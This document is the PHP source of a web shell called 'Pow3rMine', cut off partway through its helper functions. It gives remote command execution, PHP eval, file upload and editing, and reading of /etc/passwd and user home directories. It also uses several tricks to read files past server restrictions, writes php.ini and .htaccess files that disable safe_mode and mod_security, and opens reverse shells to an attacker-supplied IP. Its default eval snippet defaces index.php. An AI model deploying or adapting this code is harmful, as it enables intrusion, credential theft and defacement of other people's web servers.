Simple shell php

1. <?php
2.  
3. $user = 'tonlogin';
4. $pass = 'tonmotdepasse';
5. $uselogin = 1;
6. $sh3llColor = "green";
7.  
8. # MySQL Info ---------
9. $DBhost = "localhost";
10. $DBuser = "root";
11. $DBpass = "root";
12. #---------------------
13. session_start();
14. error_reporting(0);
15. set_magic_quotes_runtime(0);
16. set_time_limit(0);
17. ignore_user_abort(TRUE);
18. ini_restore("safe_mode");
19. ini_restore("open_basedir");
20. ini_set('max_execution_time',0);
21. ini_set('output_buffering',0);
22. ini_set('safe_mode','Off');
23.  
24. // Set Current Directory
25. if(!$_POST && !$_SESSION['curDir']) {
26. $dir = getcwd();
27. $_SESSION['curDir'] = $dir;
28. } else if(empty($_POST['curDir'])) {
29. $dir = $_SESSION['curDir'];
30. } else {
31. $dir = filter($_POST['curDir']);
32. $_SESSION['curDir'] = $dir;
33. }
34. // Set Dir Mode
35. if($_GET['dir_mode']) {
36. $dir_mode = $_GET['dir_mode'];
37. $_SESSION['dir_mode'] = $dir_mode;
38. } else {
39. $dir_mode = $_SESSION['dir_mode'];
40. }
41.  
42. // Set Usable Command
43. if($_POST['exe_method']) {
44. $exec_method = $_POST['exe_method'];
45. } else {
46. $exec_method = "exec";
47. }
48. # Logout
49. if($_POST['logout']) {
50. print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
51. print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
52. }
53. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
54. if($_GET['info']){phpinfo();}
55. $safeMode = SafeMode();
56. $server = substr($SERVER_SOFTWARE,0,120);
57. $daemon = "";
58. ?>
59. <html>
60. <head>
61. <title>Pow3rMine</title>
62. <link rel="shortcut icon" href='https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcT7-pxiVlmAxaQgk783wl4ySiJ2yZWQL7NN-9_z4VIzvMNEOZdrjQ' />
63. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
64. <embed src="" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
65. <?php echo CSS($sh3llColor); ?>
66.  
67. </head>
68. <body dir='ltr'>
69. <?php
70. # ---------------------------------------#
71. # Authentication #
72. #----------------------------------------#
73. if ($uselogin ==1) {
74. if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
75. if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
76. if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
77. print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
78. } else {
79. if($_POST['usrname']){
80. print'<script>alert("Nike ta mère ffddddpppp");</script>';
81. }
82. ?>
83. <br><br>
84. <center><img src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcT7-pxiVlmAxaQgk783wl4ySiJ2yZWQL7NN-9_z4VIzvMNEOZdrjQ"><br />
85. <sy>Pow3rMine</sy>
86. </center><br />
87. <div align="center">
88. <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
89. <input dir="ltr" name="usrname" id="username" value="" type="text" size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
90. <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
91. <input type="submit" value=" Login " name="login" />
92. </form>
93. </div>
94. <?php
95. footer();
96. exit;
97. }
98. }
99. }
100. ?>
101. <table cellpadding='0' cellspacing='0' width='100%'>
102. <tr>
103. <td width='160'>
104. <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
105. <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://www.vexilenetwork.fr/dvz.png' width='100%' height='100%'></a><br>
106. <center>PowerMine™
107. <p></p>
108. <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
109. <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
110. <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
111. </select>
112. </center>
113. </td>
114. <td>
115. <form method="post">
116. <table width='100%' style="border:none; padding:2px;" >
117. <tr>
118. <td width='103'>System</td>
119. <td width="323"><?php echo $os; ?></td>
120. <td width="90">Apache Modules</td>
121. <td width="278"><select ><?php
122. if(function_exists("apache_get_modules")) {
123. foreach (apache_get_modules() as $module) {
124. echo "<option>".$module."</option>";
125. }
126. }else {
127. echo "<option>NONE</option>";
128. }
129. ?></select></td>
130. </tr>
131. <tr>
132. <td>uname </td>
133. <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
134. <td>Curl</td>
135. <td><?php echo Curl(); ?></td>
136. </tr>
137. <tr>
138. <td>pwd</td>
139. <td><?php echo getcwd(); ?></td>
140. <td>Open Basedir</td>
141. <td><?php echo openBaseDir(); ?></td>
142. </tr>
143. <tr>
144. <td>whoami</td>
145. <td><?php echo get_current_user(); ?></td>
146. <td>Magic_Quotes</td>
147. <td><?php echo magicQouts(); ?></td>
148. </tr>
149. <tr>
150. <td>Server</td>
151. <td><?php echo $server; ?></td>
152. <td>Register Globals</td>
153. <td><?php echo RegisterGlobals(); ?></td>
154. </tr>
155. <tr>
156. <td>Server Name</td>
157. <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
158. <td>Gzip</td>
159. <td><?php echo Gzip(); ?></td>
160. </tr>
161. <tr>
162. <td>Your IP</td>
163. <td><?php echo GetRealIP(); ?></td>
164. <td>Oracle</td>
165. <td><?php echo Oracle(); ?></td>
166. </tr>
167. <tr>
168. <td>Server IP</td>
169. <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
170. <td>MSQL</td>
171. <td><?php echo MSQL(); ?></td>
172. </tr>
173. <tr>
174. <td>PHP Version</td>
175. <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
176. <td>MySQL</td>
177. <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
178. </tr>
179. <tr>
180. <td>Safe Mode</td>
181. <td><?php echo $safeMode; ?></td>
182. <td>MySQLi</td>
183. <td><?php echo MysqlI(); ?></td>
184. </tr>
185. <tr>
186. <td>disable functions</td>
187. <td><select name="disableFunctions"><?php
188. $funArray = DisableFunctions();
189. $funArray = explode(",",$funArray);
190. sort($funArray);
191. foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
192. ?></select>
193. <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
194. </td>
195. <td>MsSQL</td>
196. <td><?php echo MsSQL(); ?></td>
197. </tr>
198. </table>
199. &nbsp; [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
200. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
201. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
202.  
203. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
204. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
205. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
206. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
207. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
208. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
209. <input type="submit" name="find_755" id="find_755" value="Find 755" />
210. <br>
211. </form>
212. </table>
213.  
214. <form method="post">
215. <center>
216. <textarea cols="150" rows="20" name="result" >
217. <?php
218. chdir($dir);
219. if($_POST['login'] || !$_POST){echo ScanDirs();}
220. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
221. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
222. else if($_POST['UPLOAD_Execute']) {
223. for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
224. if($_FILES['uploadfile']['name'][$i] != '') {
225. if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
226. else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
227. if($upload) {echo "The File ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
228. "; }
229. else { echo "The File ".$_FILES['uploadfile']['name'][$i]." Can't Be Upload :( !
230. ";}
231. }
232. }
233. }
234. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
235. else if($_POST['SAVE_Execute']) {
236. $content = filter($_POST['result']);
237. if(empty($content)){$content = " ";}
238. if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
239. }
240. else if($_POST['READ_Execute']) {
241. $path = urldecode(filter($_POST['READ_Line']));
242. $file = fopen($path,'r+');
243. if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path))); }
244. else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
245. else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
246. else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
247. else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
248. else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
249. else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
250. else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
251. else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
252. else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
253. else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
254. else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
255. else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
256. else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
257. else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
258. else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
259. else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
260. else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
261. else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
262. else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
263. }
264. else if($_POST['STOP_Execute']) {
265. $genTry = GenerateFile("php.ini","
266. safe_mode = Off
267. disable_functions = NONE
268. safe_mode_gid = OFF
269. open_basedir = OFF");
270. if($genTry){echo "[+] php.ini Has Been Generated Successfully
271. ";}
272. else {echo "[-] Failed to generate php.ini file !!
273. ";}
274.  
275. $genTry = GenerateFile(".htaccess","
276. <IfModule mod_security.c>
277. SecFilterEngine Off
278. SecFilterScanPOST Off
279. SecFilterCheckURLEncoding Off
280. SecFilterCheckCookieFormat Off
281. SecFilterCheckUnicodeEncoding Off
282. SecFilterNormalizeCookies Off
283. </IfModule>
284. <Limit GET POST>
285. order deny,allow
286. deny from all
287. allow from all
288. </Limit>
289. <Limit PUT DELETE>
290. order deny,allow
291. deny from all
292. </Limit>
293. SetEnv PHPRC ".getcwd()."/php.ini
294. ");
295. if($genTry){echo "[+] .htaccess Has Been Generated Successfully
296. ";}
297. else {echo "[-] Failed to generate .htaccess file !!
298. ";}
299. }
300. else if($_POST['CON_Type'] == "socks") {
301. $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
302. if($sock < 0){echo "[-] failed to create socket.";}
303. else {
304. $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
305. if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
306. else {
307. $send_var = "\n\n -== PowerMine , Back Connection ==-\n$";
308. socket_write($sock, $send_var, strlen($send_var));
309. while($input = socket_read($sock, 10000)) {
310. socket_write($sock, shell_exec($input), 12000);
311. }
312. }
313. }
314. } else if($_POST['CON_Type'] == "fsockopen") {
315. $ip = filter(trim($_POST['ip']));
316. $port = filter(trim($_POST['port']));
317. if (!empty($ip)) {
318. $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
319. if (!$con_fsockopen){
320. $result = "Error: didnt connect !!!";
321. } else {
322. $newLine="\n";
323. fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
324. fputs($con_fsockopen , system("uname -a") .$newLine );
325. fputs($con_fsockopen , system("pwd") .$newLine );
326. fputs($con_fsockopen , system("id") .$newLine.$newLine );
327. while(!feof($con_fsockopen)){
328. fputs ($con_fsockopen);
329. $one="[$";
330. $two="]";
331. $result= fgets ($con_fsockopen, 8192);
332. $message = $result;
333. fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
334. }
335. fclose ($con_fsockopen);
336. }
337. }
338. }
339. else if($_POST['USERS_1']){echo GetUsers1();}
340. else if($_POST['USERS_2']) {
341. $array = GetUsers2();
342. foreach($array as $line)
343. {echo $line."
344. ";}
345. }
346. else if($_POST['USERS_3']) {
347. $array = GetUsers3();
348. foreach($array as $line)
349. {echo $line."
350. ";}
351. }
352. else if($_POST['USERS_4']) {
353. $array = GetUsers4();
354. foreach($array as $line)
355. {echo $line."
356. ";}
357. } else if($_POST['USERS_5']){echo GetUsers5();}
358. else if($_POST['forbidden_bypass']) {
359. mkdir("forbidden");
360. chdir("forbidden");
361. $forbidden_htaccess = GenerateFile(".htaccess", "
362. DirectoryIndex sea.txt
363. HeaderName sea.txt
364. ReadmeName sea.txt
365. footerName sea.txt
366. ErrorDocument 404 /404.html
367. 404.html = Symlinked sea.txt
368. Options all
369. ForceType text/plain
370. AddType text/plain .php
371. AddType text/plain .html
372. AddHandler server-parsed .php
373. AddHandler txt .php
374. ");
375. if($forbidden_htaccess) {
376. echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
377. } else {
378. echo "[-] error with generating .htaccess file.";
379. }
380. } else if($_POST['find_755']) {
381. Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
382. }
383. ?></textarea>
384. <?php
385. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
386. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
387. ";}
388. ?>
389. </center></form>
390. <table width='100%'>
391. <tr valign="top">
392. <td width='30%'>
393. <!-- Command Line -->
394. <form method='POST' enctype="multipart/form-data">
395. <table height='72' border='0' id='Box' width="100%">
396. <tr>
397. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
398. <td style="background-color:#666;padding-left:10px;">Edit File
399. <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
400. </tr>
401. <tr>
402. <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
403. </tr>
404. </table>
405. </form>
406. <!-- End Of Command Line-->
407.  
408. </td>
409. <td width='30%' height='30'>
410. <!-- Command Line -->
411. <form method='POST' enctype="multipart/form-data">
412. <table height='72' border='0' id='Box'>
413. <tr>
414. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
415. <td style="background-color:#666;padding-left:10px;">Command Line
416. <?php echo print_exe_method(); ?>
417. <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
418. </td>
419. </tr>
420. <tr>
421. <td height="45" colspan="2">
422. <?php echo SelectCommand($os); ?>
423. <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
424. <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
425. </tr>
426. </table>
427. </form>
428. <!-- End Of Command Line-->
429. </td>
430. <td width='30%' height='30' valign="top">
431. <!-- Commands Alias-->
432. <form method='POST' enctype="multipart/form-data">
433. <table width='100%' height='72' border='0' id='Box'>
434. <tr>
435. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
436. <td style="background-color:#666;padding-left:10px;">Upload Files <span style="padding-left:10px;">
437. <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
438. <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
439. </span></td>
440. </tr>
441. <tr>
442. <td height="45" colspan="2">
443. <input type='file' name='uploadfile[]'>
444. <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
445. </tr>
446. </table>
447. </form>
448. <!-- End Of Commands Alias-->
449. </td>
450. </tr>
451. <tr valign="top">
452. <td width='30%'>
453. <!-- Commands Alias-->
454. <form method='POST' enctype="multipart/form-data">
455. <table width='100%' height='72' border='0' id='Box'>
456. <tr>
457. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
458. <td style="background-color:#666;padding-left:10px;">PHP Eval
459. <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
460. </tr>
461. <tr>
462. <td height="45" colspan="2"><label for="PHP_Line"></label>
463. <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
464. fwrite($file,"Hacked");
465. fclose($file);';}
466. ?>
467. </textarea>
468. <br></td>
469. </tr>
470. </table>
471. </form>
472. <!-- End Of Commands Alias-->
473. </td>
474. <td width='30%' height='30'>
475. <!-- Commands Alias-->
476. <form method='POST' enctype="multipart/form-data">
477. <table width='100%' height='72' border='0' id='Box'>
478. <tr>
479. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
480. <td style="background-color:#666;padding-left:10px;">Read Files
481.  
482. <select name="READ_Type" >
483. <option value="file" >file</option>
484. <option value="fgets" >fgets</option>
485. <option value="fgetss" >fgetss</option>
486. <option value="readfile" >readfile</option>
487. <option value="fread" >fread</option>
488. <option value="show_source" >show_source</option>
489. <option value="file_get_contents" >file_get_contents</option>
490. <option value="tempnam" >tempnam</option>
491. <option value="copy" >copy</option>
492. <option value="symlink" >Symlink</option>
493. <option value="mb_send_mail" >mb_send_mail</option>
494. <option value="highlight_file" >highlight_file</option>
495. <option value="curl" >Curl</option>
496. <option value="imap" >Imap</option>
497. <option value="mysql" >MySQL</option>
498. <option value="mysqli" >MySQLI</option>
499. <option value="ioncube">Ion Cube</option>
500. <option value="error_log">Error_Log</option>
501. <option value="include">Include</option>
502. <option value="id" >ID /etc/passwd</option>
503. </select>
504. <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
505. </tr>
506. <tr>
507. <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
508. </tr>
509. </table>
510. </form>
511. <!-- End Of Commands Alias-->
512. </td>
513. <td width='30%' height='30' valign="top">
514. <!-- Commands Alias-->
515. <form method='POST' enctype="multipart/form-data">
516. <table width='100%' height='72' border='0' id='Box'>
517. <tr>
518. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
519. <td style="background-color:#666;padding-left:10px;">Back Connection
520. <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
521. </tr>
522. <tr>
523. <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
524. <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
525. <select name="CON_Type" >
526. <option value="socks">SOCKS</option>
527. <option value="fsockopen">FSOCKOPEN</option>
528. </select>
529. </td>
530. </tr>
531. </table>
532. </form>
533. <!-- End Of Commands Alias-->
534. </td>
535. </tr>
536. </table>
537. <?php
538. function IncludeReader($path) {
539. global $os;
540. if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
541. $fileName = substr(strrchr($path,$slash),1);
542. $includePath = substr($path,0,strpos($path,$fileName,0));
543. ini_set("include_path",$includePath);
544. include($fileName);
545. }
546. function GetUsers1() {
547. return Exe('ls /var/mail');
548. }
549. function GetUsers2() {
550. $array = array();
551. $lines = file("/etc/passwd");
552. foreach($lines as $nr=>$val) {
553. $str = explode(":",$val);
554. array_push($array,$str[0]);
555. }
556. return $array;
557. }
558. function GetUsers3() {
559. $array = array();
560. if ($dh = opendir("/home/")) {
561. while (($file = readdir($dh)) !== false) {
562. array_push($array,$file);
563. }
564. closedir($dh);
565. return $array;
566. }
567. }
568. function GetUsers4() {
569. $dir = "/home/";
570. $array = array();
571. if ($dh = opendir($dir)) {
572. $f = readdir($dh);
573. while (($f = readdir($dh)) !== false) {
574. $dh2=opendir($dir."/");
575. $f2 = readdir($dh2);
576. while (($f2 = readdir($dh2)) !== false) {
577. $f2.="/";
578. $dh3=opendir($dir.$f.$f2);
579. $f3 = readdir($dh3);
580. while (($f3 = readdir($dh3)) !== false) {
581. array_push($array,$f3);
582. }
583. }
584. }
585. closedir($dh);
586. return $array;
587. }
588. }
589. function GetUsers5(){
590. return realpath('/etc/passwd');
591. }
592. function ErrorLog($path){
593. $tempFile = uniqid();
594. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
595. error_log(file_get_contents($path), 3, $tempFile);
596. $content = file_get_contents($tempFile);
597. unlink($tempFile);
598. return $content;
599. }
600. function SymlinkF($path) {
601. $tempFile = uniqid();
602. if(function_exists('symlink')) {
603. symlink($path,$tempFile);
604. $content = file_get_contents($tempFile);
605. unlink($tempFile);
606. return $content;
607. }
608. }
609. function MySQLReader($path) {
610. global $DBhost,$DBuser,$DBpass;
611. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
612. $con = mysql_connect($DBhost,$DBuser,$DBpass);
613. mysql_query("CREATE DATABASE a");
614. mysql_query("CREATE TABLE a.a (a varchar(1024))");
615. mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
616. mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
617. $result = mysql_query("SELECT a FROM a.a");
618. while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
619. mysql_query("DROP DATABASE a");
620. }
621. function MySQLIReader($path) {
622. global $DBhost,$DBuser,$DBpass;
623. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
624. $con = mysql_connect($DBhost,$DBuser,$DBpass);
625. mysql_query("CREATE DATABASE a");
626. mysql_query("CREATE TABLE a.a (a varchar(1024))");
627.  
628. function r($fp, &$buf, $len, &$err) {
629. print fread($fp, $len);
630. }
631. $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
632. $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
633. $m->set_local_infile_handler("r");
634. $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
635. $m->close();
636. }
637. function DBConnect($host,$user,$pass,$db) {
638. $connect = mysql_pconnect($host,$user,$pass);
639. if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false; }
640. else {
641. $tryToSelectDB = mysql_select_db($db,$connect);
642. if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false; }
643. else{return true; return $connect;}
644. }
645. }
646. function ReadId($path) {
647. for($uid=0;$uid<60000;$uid++) {
648. $ara = posix_getpwuid($uid);
649. if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
650. }
651. }
652. return $content;
653. }
654. function ImapF($path) {
655. $stream = imap_open($path, "", "");
656. $str = imap_body($stream, 1);
657. imap_close($stream);
658. return $str;
659. }
660. function FileF($path) {
661. $lines = file($path); foreach($lines as $line){$content .= $line;}
662. return $content;
663. }
664. function CopyF($path) {
665. $tempFile = md5(uniqid()).".bb";
666. copy($path,$tempFile);
667. $content = file_get_contents($tempFile);
668. unlink($tempFile);
669. return $content;
670. }
671. function fgetssF($path) {
672. while(($line = fgetss($path)) != false){$content .= $line;}
673. return $content;
674. }
675. function highlightFile($path) {
676. return highlight_file($path);
677. }
678. function mbSendEmail($path) {
679. if(function_exists('mb_send_mail')) {
680. $tempFile = uniqid();
681. $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
682. mb_send_mail("email@example.com", NULL, NULL, NULL, $additional_param);
683. $content = file_get_contents($tempFile);
684. unlink($tempFile);
685. return $content;
686. }
687. }
688. function DeleteFile($fileName) {
689. global $os;
690. if(function_exists('unlink'))
691. {$delete = unlink($fileName);}
692. if((!$delete) && ($os == 'Windows'))
693. {$delete = Exe("del $fileName"); }
694. else if((!$delete) && ($os == 'Linux'))
695. {$delete = Exe("rm -f $fileName");}
696. if($delete){return true;}else{return false;}
697. }
698. function CurlFileRead($path) {
699. $ch = curl_init("file://".$path."\x00".__FILE__);
700. var_dump(curl_exec($ch));
701. }
702. function FReadF($path) {
703. $file = fopen($path,'r+'); //Open The File
704. if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
705. fclose($file);
706. }
707. function TempnameF($path) {
708. global $dir;
709. $temp = tempnam($dir, "cx");
710. if(copy("compress.zlib://".$path, $temp)) {
711. $handler = fopen($temp, "r");
712. $readFile = fread($handler, @filesize($temp));
713. fclose($handler);
714. $content .= htmlspecialchars($filename);
715. $content .= nl2br(htmlspecialchars($readFile));
716. $content .= htmlspecialchars($filename);
717. unlink($temp);
718. return $content;
719. }
720. }
721. function Evaluation($eval) {
722. $eval = str_replace(array("<?php","<?","?>"),"",$eval);
723. $eval = eval($eval);
724. if($eval){return true;}else{return false;}
725. }
726. function Oracle() {
727. if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
728. else {$oracle = '<font color="green">OFF</font>';}return $oracle;
729. }
730. function MsSQL() {
731. if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
732. else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
733. }
734. function MySQL2() {
735. $mysql_try = function_exists('mysql_connect');
736. if($mysql_try){$mysql = '<font color="red">ON</font>';}
737. else {$mysql = '<font color="green">OFF</font>';}return $mysql;
738. }
739. function MSQL() {
740. if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
741. else {$mSql = '<font color="green">OFF</font>';}return $mSql;
742. }
743. function MysqlI() {
744. if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
745. else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
746. }
747. function Gzip() {
748. if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
749. else {$gzip = '<font color="green">OFF</font>';}return $gzip;
750. }
751. function openBaseDir() {
752. $openBaseDir = ini_get("open_basedir");
753. if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
754. else {$openBaseDir = '<font color="red">ON</font>';}
755. return $openBaseDir;
756. }
757. function Curl() {
758. if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
759. else{$curl = '<font color="green">OFF</font>';}return $curl;
760. }
761. function magicQouts() {
762. if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
763. if (empty($mag)){$mag = '<font color="green">OFF</font>';}
764. else {$mag= '<font color="red">ON</font>';}return $mag;
765. }
766. function SafeMode() {
767. $safe_mode = ini_get("safe_mode");
768. if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
769. else {$safe_mode = '<font color="red">ON</font>';}
770. return $safe_mode;
771. }
772. function DisableFunctions() {
773. $disfun = ini_get('disable_functions');
774. if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
775. }
776. function RegisterGlobals() {
777. if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
778. else{$registerg= '<font color="green">OFF</font>';}return $registerg;
779. }
780. function GetRealIP() {
781. if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
782. elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
783. else {$ip=getenv(REMOTE_ADDR);}
784. return $ip;
785. }
786. function SelectCommand($os) {
787. global $os;
788. if($os == 'Windows') {
789. echo "
790. <select name='alias' id='alias' onChange='AddAlias();' >
791. <option value=''>NONE</option>
792. <option value='dir' >List Directory</option>
793. <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
